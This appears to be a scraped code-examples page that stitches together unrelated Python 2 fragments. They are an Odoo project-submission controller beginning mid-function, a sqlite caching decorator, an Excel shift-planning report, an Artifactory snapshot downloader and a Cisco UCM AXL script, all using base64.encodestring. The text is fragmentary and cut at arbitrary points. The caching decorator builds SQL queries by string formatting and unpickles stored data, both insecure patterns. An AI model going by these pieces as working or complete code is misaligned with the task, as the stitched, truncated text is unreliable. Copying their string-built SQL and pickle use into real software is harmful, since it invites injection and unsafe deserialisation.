                elif (current_stage == 3 or current_stage == 4
                      ) and post.get('to-save') == "1" and post.get('name'):
                    #partner_organisme = env['res.partner'].create({'name': post.get('organisme')})
                    category_id = False
                    if post.get('category_id'):
                        category_id = env['res.partner.category'].search([
                            ('name', '=', post.get('category_id'))
                        ])
                        if not category_id:
                            category_id = env['res.partner.category'].create(
                                {'name': post.get('category_id')})
                    partner_value = {
                        'name':
                        post.get('name') and post.get('name'),
                        'country_id':
                        post.get('partner_country')
                        and post.get('partner_country'),
                        'is_company':
                        True,
                        'city':
                        post.get('city') and post.get('city'),
                        'zip':
                        post.get('zip') and post.get('zip'),
                        'street':
                        post.get('street') and post.get('street'),
                        'street2':
                        post.get('street2') and post.get('street2'),
                        'email':
                        post.get('email') and post.get('email'),
                        'phone':
                        post.get('phone') and post.get('phone'),
                        'fax':
                        post.get('fax') and post.get('fax'),
                        'website':
                        post.get('website') and post.get('website'),
                        'cnss':
                        post.get('cnss') and post.get('cnss'),
                        'ca':
                        post.get('ca') and post.get('ca'),
                        'capital':
                        post.get('capital') and post.get('capital'),
                        'partner_references':
                        post.get('partner_references')
                        and post.get('partner_references'),
                        'rc':
                        post.get('rc') and post.get('rc'),
                        'category_id':
                        category_id and [(6, 0, [category_id.id])],
                        'title':
                        post.get('title') and post.get('title'),
                        'date':
                        post.get('date') != '' and post.get('date'),
                        'effectif_doc':
                        post.get('effectif_doc') and post.get('effectif_doc'),
                        'effectif':
                        post.get('effectif') and post.get('effectif'),
                        'effectif_chercheur':
                        post.get('effectif_chercheur')
                        and post.get('effectif_chercheur'),
                        'entite_recherche':
                        post.get('entite_recherche')
                        and post.get('entite_recherche'),
                        #'parent_id': partner_organisme.id,
                        'category':
                        'scientifique' if current_stage == 3 else 'industriel',
                        'submissions': [(4, submission.id)]
                    }
                    if post.get('partner_id') is not None:
                        partner = sudo_env['res.partner'].browse(
                            int(post.get('partner_id')))
                        partner.write(partner_value)
                    else:
                        partner = sudo_env['res.partner'].create(partner_value)
                    contact_value = {
                        'name':
                        post.get('contact_name'),
                        'function':
                        post.get('contact_function'),
                        'phone':
                        post.get('contact_phone'),
                        'email':
                        post.get('contact_email'),
                        'parent_id':
                        partner.id,
                        'category':
                        'scientifique' if current_stage == 3 else 'industriel'
                    }
                    if partner.child_ids.ids:
                        partner.child_ids[0].write(contact_value)
                    else:
                        sudo_env['res.partner'].create(contact_value)
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': partner.name,
                                'res_model': 'res.partner',
                                'res_id': partner.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            sudo_env['ir.attachment'].create(attachment_value)
                #Stage 4: Additional info
                elif current_stage == 5:
                    value = {
                        'etat_art':
                        post.get('etat_art'),
                        'objective':
                        post.get('objective'),
                        'objectives':
                        post.get('objectives'),
                        'fallout':
                        post.get('fallout'),
                        'perspective':
                        post.get('perspective'),
                        'produits_services_process':
                        post.get('produits_services_process'),
                        'analyse_macro':
                        post.get('analyse_macro'),
                        'analyse_marche':
                        post.get('analyse_marche'),
                        'cible':
                        post.get('cible'),
                        'analyse_competitive':
                        post.get('analyse_competitive'),
                        'proposition_valeur':
                        post.get('proposition_valeur'),
                        'business_model':
                        post.get('business_model'),
                        'invest_retour':
                        post.get('invest_retour'),
                        'plan':
                        post.get('plan'),
                    }
                    submission.write(value)
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': submission.name,
                                'res_model': 'project.submission',
                                'res_id': submission.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            env['ir.attachment'].create(attachment_value)
                        submission._get_attached_docs()
                #Stage 5: Tasks
                elif current_stage == 6 and post.get(
                        'to-save') == "1" and post.get('name') and post.get(
                            'type'):
                    value = {
                        'name':
                        post.get('name'),
                        'type':
                        post.get('type'),
                        'semester':
                        post.get('semester'),
                        'objectives':
                        post.get('objectives'),
                        'description':
                        post.get('description'),
                        'partner':
                        post.get('partner'),
                        'submission':
                        submission.id,
                        'partners': [(6, 0, [
                            int(x) for x in request.httprequest.form.getlist(
                                'partners')
                        ])],
                    }
                    if post.get('task_id') is not None:
                        task = env['project.submission.task'].browse(
                            int(post.get('task_id')))
                        task.write(value)
                    else:
                        env['project.submission.task'].create(value)
                #Stage 6: Project budget informations
                elif current_stage == 7:
                    for line in submission.budget_lines:
                        vals = {
                            'montant_propre':
                            post.get(str(line.id) + 'montant_propre') and
                            float(post.get(str(line.id) + 'montant_propre')),
                            'montant_subventionne':
                            post.get(str(line.id) + 'montant_subventionne')
                            and float(
                                post.get(
                                    str(line.id) + 'montant_subventionne'))
                        }
                        line.write(vals)
                    for line in submission.personnels:
                        vals = {
                            'time':
                            post.get(str(line.id) + 'time')
                            and int(post.get(str(line.id) + 'time')),
                            'number':
                            post.get(str(line.id) + 'number')
                            and float(post.get(str(line.id) + 'number')),
                            'montant_propre':
                            post.get(
                                str(line.id) + 'montant_propre_personnel')
                            and float(
                                post.get(
                                    str(line.id) +
                                    'montant_propre_personnel')),
                            'montant_demande':
                            post.get(
                                str(line.id) + 'montant_demande_personnel')
                            and float(
                                post.get(
                                    str(line.id) +
                                    'montant_demande_personnel'))
                        }
                        line.write(vals)
                    for line in submission.costs:
                        vals = {
                            'montant':
                            post.get(str(line.id) + 'montant_cout')
                            and float(post.get(str(line.id) + 'montant_cout'))
                        }
                        line.write(vals)

                elif current_stage == 8:

                    if post.get('ufile'):
                        attachment_value = {
                            'name':
                            str(time.time()) + '_' + post['ufile'].filename,
                            'res_name':
                            submission.name,
                            'res_model':
                            'project.submission',
                            'res_id':
                            submission.id,
                            'datas':
                            base64.encodestring(post['ufile'].read()),
                            'datas_fname':
                            post['ufile'].filename,
                            'parent_id':
                            sudo_env['document.directory'].search([
                                ('name', '=', 'Conventions')
                            ]) and sudo_env['document.directory'].search(
                                [('name', '=', 'Conventions')]).ids[0]
                        }
                        sudo_env['ir.attachment'].create(attachment_value)
                    if post.get('submit') == 'confirm':
                        submission.state = 'submitted'
        except ValidationError, e:
            next_stage = current_stage
            if post.get('partner_id'):
                post.update({'edit-partner': post.get('partner_id')})
            if post.get('task_id'):
                post.update({'edit-task': post.get('task_id')})
            if post.get('budgetline_id'):
                post.update({'edit-budgetline': post.get('budgetline_id')})
            env.cr.rollback()
            env.invalidate_all()
            error.update({'main': e.value})
示例#32
0
        def wrapper(*args, **kwargs):
            is_cashed = None
            is_cropped = None
            conn = sqlite3.connect(DB_NAME)
            c = conn.cursor()

            PICKLE_ARGS = base64.encodestring(
                pickle.dumps(args[1:], pickle.HIGHEST_PROTOCOL))
            PICKLE_KWARGS = base64.encodestring(
                pickle.dumps(kwargs, pickle.HIGHEST_PROTOCOL))

            SQL_SELECT = "SELECT * FROM  %s WHERE func_name='%s' AND func_args='%s' AND func_kwargs ='%s'" % (
                DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS)

            SQL_DELETE = "DELETE FROM  %s WHERE func_name='%s' AND func_args='%s' AND func_kwargs ='%s'" % (
                DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS)

            SQL_COUNT = "SELECT count(*) FROM  %s WHERE func_name='%s'" % (
                DB_TABLE, func.__name__)
            SQL_CROP = "DELETE FROM  %s WHERE func_name='%s' AND cashed_date=(SELECT min(cashed_date) FROM '%s')" % (
                DB_TABLE, func.__name__, DB_TABLE)
            SQL_CROP_TTL = "DELETE FROM  %s WHERE func_name='%s' AND cashed_date<'%s'" % (
                DB_TABLE, func.__name__, datetime.now() - data_ttl)

            dt = datetime.now()

            def SQL_INSERT(arg):
                PIKLE_RES = base64.encodestring(
                    pickle.dumps(arg, pickle.HIGHEST_PROTOCOL))
                return "INSERT INTO  %s (func_name, func_args, func_kwargs, cashed_result, cashed_date) VALUES ('%s','%s', '%s', '%s','%s')" % (
                    DB_TABLE, func.__name__, PICKLE_ARGS, PICKLE_KWARGS,
                    PIKLE_RES, dt)

            def UNPIKLE(arg):
                try:
                    return pickle.loads(base64.decodestring(arg))
                except:
                    return None

            # killing all items with old ttl
            c.execute(SQL_CROP_TTL)

            fetched_row = c.execute(SQL_SELECT).fetchone()
            if fetched_row:
                # return cached values
                output = UNPIKLE(fetched_row[3])
                is_cashed = "CASHED"
            else:
                # cashing
                if c.execute(SQL_COUNT).fetchone()[0] >= DB_MAX_ITEMS:
                    # if there no more place we killing oldest item
                    is_cropped = "ITEMS IS CROPPED"
                    c.execute(SQL_CROP)

                output = func(*args, **kwargs)
                c.execute(SQL_DELETE)
                c.execute(SQL_INSERT(output))
                is_cashed = "NON CASHED"

            #================================================================================

            conn.commit()
            c.close()
            if debug:
                return output, is_cashed, is_cropped
            else:
                return output
    def button_excel(self, data, context=None):
        fillGRINDING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        fillGOUGING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        fillWELDING = PatternFill(start_color='FFFF0000', end_color='FFFF0000', fill_type='solid')
        commGRINDING = [None] * 200
        commGOUGING = [None] * 200
        commWELDING = [None] * 200
        src = path.dirname(path.realpath(__file__)) + "/FinishFetplan.xlsx"
        wb = openpyxl.load_workbook(src)
        wb.active = 0
        worksheet = wb.active
        filename = 'FinishFetplan.xlsx'
        reportname = "FinishFetPlan:"
        self.name = 'Finish Fet Plan Report as on: ' + str(self.from_dt)

        # Start of Section to generate load portion of sheet
        wb.active = 0
        worksheet = wb.active
        itemheader_obj = self.env['finishfetplanmodule.manpowertable']
        item_ids = itemheader_obj.search([(1, '=', 1)])
        for thisitem in item_ids:
            if thisitem.jobrouting_id.name == 'WELDING':
                welding_shift_a = thisitem.shift_a
                welding_shift_b = thisitem.shift_b
                welding_shift_c = thisitem.shift_c
            if thisitem.jobrouting_id.name == 'GRINDING':
                grinding_shift_a = thisitem.shift_a
                grinding_shift_b = thisitem.shift_b
                grinding_shift_c = thisitem.shift_c
            if thisitem.jobrouting_id.name == 'Gouging':
                gouging_shift_a = thisitem.shift_a
                gouging_shift_b = thisitem.shift_b
                gouging_shift_c = thisitem.shift_c

        itemheader_obj = self.env['finishfetplanmodule.itemplantable']
        item_ids = itemheader_obj.search(['&', ('date', '>=', self.from_dt), ('items_status', '=', False)])

        for thisitem in item_ids:
            if thisitem.date >= self.from_dt:
                datediff = (thisitem.date - self.from_dt)
                col = ((datediff.days + 1) * 3) + 1
                dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                setdate = worksheet.cell(row=11, column=col)
                setdate.value = dateStr
                if thisitem.jobrouting_id.name == 'WELDING':
                    row = 14
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if WELDER is Overloaded in Shift A
                            if welding_shift_a < setcol2.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_a) + ' WELDER in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if WELDER is Overloaded in Shift B
                            if welding_shift_b < setcol3.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_b) + ' WELDER in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift B

                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = welding_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if WELDER is Overloaded in Shift C
                            if welding_shift_c < setcol4.value:
                                commWELDING[col] = Comment(
                                    'Overloaded: Out of ' + str(welding_shift_c) + ' WELDER in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift A

                        else:
                            setcol4.value = thisitem.shift_c

                if thisitem.jobrouting_id.name == 'GRINDING':
                    row = 17
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if GRINDING is Overloaded in Shift A
                            if grinding_shift_a < setcol2.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_a) + ' GRINDING in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if WELDER is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if GRINDING is Overloaded in Shift B
                            if grinding_shift_b < setcol3.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_b) + ' GRINDING in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if GRINDING is Overloaded in Shift B
                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = grinding_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if GRINDING is Overloaded in Shift C
                            if grinding_shift_c < setcol4.value:
                                commGRINDING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        grinding_shift_c) + ' GRINDING in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if GRINDING is Overloaded in Shift C

                        else:
                            setcol4.value = thisitem.shift_c

                if thisitem.jobrouting_id.name == 'Gouging':
                    row = 20
                    if thisitem.shift_a > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_a
                        setcol2 = worksheet.cell(row=row, column=col)
                        if setcol2.value:
                            setcol2.value = setcol2.value + thisitem.shift_a or ''
                            # Setting value of comment if Gouging is Overloaded in Shift A
                            if gouging_shift_a < setcol2.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_a) + ' Gouging in Shift A loaded ' + str(
                                        setcol2.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift A
                        else:
                            setcol2.value = thisitem.shift_a or ''
                    col = col + 1

                    if thisitem.shift_b > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_b
                        setcol3 = worksheet.cell(row=row, column=col)
                        if setcol3.value:
                            setcol3.value = setcol3.value + thisitem.shift_b or ''
                            # Setting value of comment if Gouging is Overloaded in Shift B
                            if gouging_shift_b < setcol3.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_b) + ' Gouging in Shift B loaded ' + str(
                                        setcol3.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift B
                        else:
                            setcol3.value = thisitem.shift_b or ''
                    col = col + 1

                    if thisitem.shift_c > 0:
                        setcol = worksheet.cell(row=row - 1, column=col)
                        setcol.value = gouging_shift_c
                        setcol4 = worksheet.cell(row=row, column=col)
                        if setcol4.value:
                            setcol4.value = setcol4.value + thisitem.shift_c
                            # Setting value of comment if Gouging is Overloaded in Shift C
                            if gouging_shift_c < setcol4.value:
                                commGOUGING[col] = Comment(
                                    'Overloaded: Out of ' + str(
                                        gouging_shift_c) + ' Gouging in Shift C loaded ' + str(
                                        setcol4.value), 'System')
                            # END of : Setting value of comment if Gouging is Overloaded in Shift C
                        else:
                            setcol4.value = thisitem.shift_c

        # End of Generation of Load portion of sheet
        # Start of Section to Generate Plan portion of the sheet
        itemheader_obj = self.env['finishfetplanmodule.itemplanheadertable']
        itemheader_ids = itemheader_obj.search(['&', ('plan_date', '>=', self.from_dt), ('item_status', '!=', True)])
        row = 26
        for thisitems_id in itemheader_ids:
            setcol1 = worksheet.cell(row=row, column=1)
            setcol1.value = thisitems_id.name or ''
            setcol1 = worksheet.cell(row=row, column=2)
            setcol1.value = thisitems_id.wo_srno or ''

            for thisitem in thisitems_id.itemplan_id:
                if thisitem.date >= self.from_dt:
                    datediff = (thisitem.date - self.from_dt)
                    col = ((datediff.days + 1) * 3) + 1
                    dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                    setdate = worksheet.cell(row=24, column=col)
                    setdate.value = dateStr
                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift A
                    # if thisitem.shift_a_c != '':
                    #     setcol2 = worksheet.cell(row=row, column=col)
                    #     setcol2.value = thisitem.shift_a_c or ''
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol2.fill = colorfill

                    # for  Decimal or Number  Value Shift A
                    if thisitem.shift_a > 0 and thisitem.jobrouting_id:
                        setcol2 = worksheet.cell(row=row, column=col)
                        setcol2.value = thisitem.shift_a
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol2.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol2.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift A

                        # Setting value of comment if GRINDING is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol2.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift A

                        # Setting value of comment if Gouging is Overloaded in Shift A
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol2.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift A

                    col = col + 1
                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift B
                    # if thisitem.shift_b_c != '':
                    #     setcol3 = worksheet.cell(row=row, column=col)
                    #     setcol3.value = thisitem.shift_b_c or ''
                    #
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol3.fill = colorfill
                    # for  Decimal or Number  Value Shift B
                    if thisitem.shift_b > 0 and thisitem.jobrouting_id:
                        setcol3 = worksheet.cell(row=row, column=col)
                        setcol3.value = thisitem.shift_b
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol3.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol3.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift B

                        # Setting value of comment if GRINDING is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol3.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift B

                        # Setting value of comment if Gouging is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol3.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift B

                    col = col + 1
                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift C
                    # if thisitem.shift_c_c != '':
                    #     setcol4 = worksheet.cell(row=row, column=col)
                    #     setcol4.value = thisitem.shift_c_c or ''
                    #     if str(thisitem.bg_color_cell)[0:2] == 'FF':
                    #         colorfill = PatternFill(start_color=thisitem.bg_color_cell,
                    #                                 end_color=thisitem.bg_color_cell, fill_type='solid')
                    #         setcol4.fill = colorfill

                    # for  Decimal or Number  Value Shift C
                    if thisitem.shift_c > 0 and thisitem.jobrouting_id:
                        setcol4 = worksheet.cell(row=row, column=col)
                        setcol4.value = thisitem.shift_c
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')
                        setcol4.fill = colorfill
                        # Setting value of comment if WELDER is Overloaded in Shift C
                        if thisitem.jobrouting_id.name == 'WELDING':
                            if commWELDING[col]:
                                setcol4.comment = commWELDING[col]
                        # END of Setting value of comment if WELDER is Overloaded in Shift C

                        # Setting value of comment if GRINDING is Overloaded in Shift B
                        if thisitem.jobrouting_id.name == 'GRINDING':
                            if commGRINDING[col]:
                                setcol4.comment = commGRINDING[col]
                        # END of Setting value of comment if GRINDING is Overloaded in Shift C

                        # Setting value of comment if Gouging is Overloaded in Shift C
                        if thisitem.jobrouting_id.name == 'Gouging':
                            if commGOUGING[col]:
                                setcol4.comment = commGOUGING[col]
                        # END of Setting value of comment if Gouging is Overloaded in Shift C

            row = row + 2
        # End of Section to generate Plan portion of the sheet

        # Start of Generation of Actual portion of sheet
        wb.active = 0
        worksheet = wb.active
        # Generating Actual Portion

        itemheader_obj = self.env['finishfetplanmodule.itemplanheadertable']
        itemheader_ids = itemheader_obj.search(['&', ('plan_date', '>=', self.from_dt), ('item_status', '!=', True)])
        row = 27
        for thisitems_id in itemheader_ids:
            # Thse are already set while writing Plan portion. Row 15 is merged with Row 14 so write not possible
            # setcol1 = worksheet.cell(row=row, column=1)
            # setcol1.value = thisitems_id.name or ''
            # setcol1 = worksheet.cell(row=row, column=2)
            # setcol1.value = thisitems_id.wo_srno or ''

            for thisitem in thisitems_id.actualitemplan_id:
                if thisitem.date >= self.from_dt:
                    datediff = (thisitem.date - self.from_dt)
                    col = ((datediff.days + 1) * 3) + 1
                    dateStr = str(thisitem.date.day) + "/" + str(thisitem.date.month)
                    setdate = worksheet.cell(row=24, column=col)
                    setdate.value = dateStr

                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift A
                    # if thisitem.shift_a_c != '':
                    #     setcol2 = worksheet.cell(row=row, column=col)
                    #     setcol2.value = thisitem.shift_a_c or ''
                    # # for  Decimal or Number  Value Shift A
                    #
                    if thisitem.shift_a > 0:
                        setcol2 = worksheet.cell(row=row, column=col)
                        setcol2.value = thisitem.shift_a or ''
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol2.fill = colorfill
                    col = col + 1
                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift B
                    # if thisitem.shift_b_c != '':
                    #     setcol3 = worksheet.cell(row=row, column=col)
                    #     setcol3.value = thisitem.shift_b_c or ''
                    #
                    # for  Decimal or Number  Value Shift B
                    if thisitem.shift_b > 0:
                        setcol3 = worksheet.cell(row=row, column=col)
                        setcol3.value = thisitem.shift_b or ''
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol3.fill = colorfill
                    col = col + 1
                    # # Commeting out Text Read portion as it is taking tooo long
                    # # for  String  Value Shift C
                    # if thisitem.shift_c_c != '':
                    #     setcol4 = worksheet.cell(row=row, column=col)
                    #     setcol4.value = thisitem.shift_c_c or ''
                    #
                    # for  Decimal or Number  Value Shift C
                    if thisitem.shift_c > 0:
                        setcol4 = worksheet.cell(row=row, column=col)
                        setcol4.value = thisitem.shift_c
                        colorfill = PatternFill(start_color=thisitem.jobrouting_id.colour,
                                                end_color=thisitem.jobrouting_id.colour, fill_type='solid')

                        setcol4.fill = colorfill
            row = row + 2
        wb.active = 0
        worksheet = wb.active
        fp = io.BytesIO()
        wb.save(fp)
        out = base64.encodestring(fp.getvalue())
        self.download_file = out
        self.report_flag = 1
示例#34
0
def get_latest_snapshot(artifactory_url,
                        repository,
                        group_id,
                        artifact_id,
                        packaging,
                        target_dir='/tmp',
                        target_file=None,
                        classifier=None,
                        username=None,
                        password=None):
    '''
       Gets latest snapshot of the given artifact

       artifactory_url
           URL of artifactory instance
       repository
           Snapshot repository in artifactory to retrieve artifact from, for example: libs-snapshots
       group_id
           Group Id of the artifact
       artifact_id
           Artifact Id of the artifact
       packaging
           Packaging type (jar,war,ear,etc)
       target_dir
           Target directory to download artifact to (default: /tmp)
       target_file
           Target file to download artifact to (by default it is target_dir/artifact_id-snapshot_version.packaging)
       classifier
           Artifact classifier name (ex: sources,javadoc,etc). Optional parameter.
       username
           Artifactory username. Optional parameter.
       password
           Artifactory password. Optional parameter.
       '''
    log.debug(
        "======================== MODULE FUNCTION: artifactory.get_latest_snapshot, artifactory_url=%s, repository=%s, group_id=%s, artifact_id=%s, packaging=%s, target_dir=%s, classifier=%s)",
        artifactory_url, repository, group_id, artifact_id, packaging,
        target_dir, classifier)

    headers = {}
    if username and password:
        headers['Authorization'] = 'Basic {0}'.format(
            base64.encodestring('{0}:{1}'.format(username,
                                                 password)).replace('\n', ''))
    artifact_metadata = _get_artifact_metadata(artifactory_url=artifactory_url,
                                               repository=repository,
                                               group_id=group_id,
                                               artifact_id=artifact_id,
                                               headers=headers)
    version = artifact_metadata['latest_version']
    snapshot_url, file_name = _get_snapshot_url(
        artifactory_url=artifactory_url,
        repository=repository,
        group_id=group_id,
        artifact_id=artifact_id,
        version=version,
        packaging=packaging,
        classifier=classifier,
        headers=headers)
    target_file = __resolve_target_file(file_name, target_dir, target_file)

    return __save_artifact(snapshot_url, target_file, headers)
示例#35
0
def main():
    parser = argparse.ArgumentParser(description='UCM Script Options')
    parser.add_argument('-i', dest='host', help='Please specify UCM address.')
    parser.add_argument('-u', dest='user', help='Enter Username.')
    parser.add_argument('-p', dest='pwd', help='Enter Password.')
    parser.add_argument('-v',
                        dest='ver',
                        help='Enter Version. (10.0, 10.5, 11.0, 11.5)')
    parser.add_argument(
        '-a',
        dest='sso',
        help='SSO enabled "true" or "false" - "false is assumed"')
    parser.add_argument('-l', dest='log', help='Log file name.')
    parser.add_argument(
        '-s',
        dest='sOption',
        help='Script Option. Options include: partition, speeddial')
    options = parser.parse_args()
    global ip, user, pwd, client, axlver, wsdl
    if options.ver:
        axlver = options.ver
    else:
        axlver = raw_input(
            "Please Enter the version of the CUCM cluster (10.0, 10.5, 11.0, 11.5) > "
        )
    if options.host:
        ip = options.host
    else:
        ip = raw_input(
            "Please Enter the IP Address or Hostname of your CUCM > ")
    if options.user:
        user = options.user
    else:
        user = raw_input("Please Enter Your CUCM User ID > ")
    if options.pwd:
        pwd = options.pwd
    else:
        pwd = getpass("Please Enter Your Password > ")
    if options.sso:
        ssocheck = options.sso
    else:
        ssocheck = "false"
    if options.log:
        logfile = options.log + datetime.now().strftime(
            '%Y-%m-%d-%H%M%S') + '.log'
    else:
        logfile = 'lastlog' + datetime.now().strftime(
            '%Y-%m-%d-%H%M%S') + '.log'
    tns = 'http://schemas.cisco.com/ast/soap/'
    imp = Import('http://schemas.xmlsoap.org/soap/encoding/',
                 'http://schemas.xmlsoap.org/soap/encoding/')
    imp.filter.add(tns)
    location = 'https://' + ip + ':8443/axl/'
    wsdl = axltoolkit(axlver)
    if ssocheck == "true":
        base64string = base64.encodestring('%s:%s' % (user, pwd)).replace(
            '\n', '')
        authenticationHeader = {
            "SOAPAction": "ActionName",
            "Authorization": "Basic %s" % base64string
        }
        try:
            client = Client(wsdl,
                            location=location,
                            faults=False,
                            plugins=[ImportDoctor(imp)],
                            headers=authenticationHeader)
        except:
            print "Error with version or IP address of server. Please try again."
            sys.exit()
    else:
        try:
            client = Client(wsdl,
                            location=location,
                            faults=False,
                            plugins=[ImportDoctor(imp)],
                            username=user,
                            password=pwd)
        except:
            print "Error with version or IP address of server. Please try again."
            sys.exit()
    try:
        verresp = client.service.getCCMVersion()
    except:
        print('Unknown Error. Please try again.')
        sys.exit()
    if verresp[0] == 401:
        print('Authentication failure. Wrong username or password.')
        sys.exit()
    cucmver = verresp[1]['return'].componentVersion.version
    cucmsplitver = cucmver.split('.')
    cucmactualver = cucmsplitver[0] + '.' + cucmsplitver[1]
    print('This cluster is version ' + cucmver)
    if axlver != cucmactualver:
        print('You chose the wrong version. The correct version is '
              ) + cucmactualver
        print('Please choose the correct version next time.')
        sys.exit()
    scriptoptionnum = ""
    scriptoption = ""
    if options.sOption:
        scriptoption = options.sOption
    else:
        while scriptoptionnum == "":
            print(
                'Select an option by typing the number beside the selection.')
            print('1. Partition - Change the partition on a DN.')
            print('2. Speeddial - Add a speed dial to a phone.')
            scriptoptionnum = raw_input('> ')
    if scriptoptionnum == '1':
        partition(logfile)
        sys.exit()
    if scriptoptionnum == '2':
        speeddial(logfile)
        sys.exit()
    if scriptoption == 'partition':
        partition(logfile)
        sys.exit()
    if scriptoption == 'speeddial':
        speeddial(logfile)
        sys.exit()
    else:
        print('Please enter an option next time you run the script.')
        sys.exit()
示例#36
0
文件: models.py 项目: wdmchaft/hue
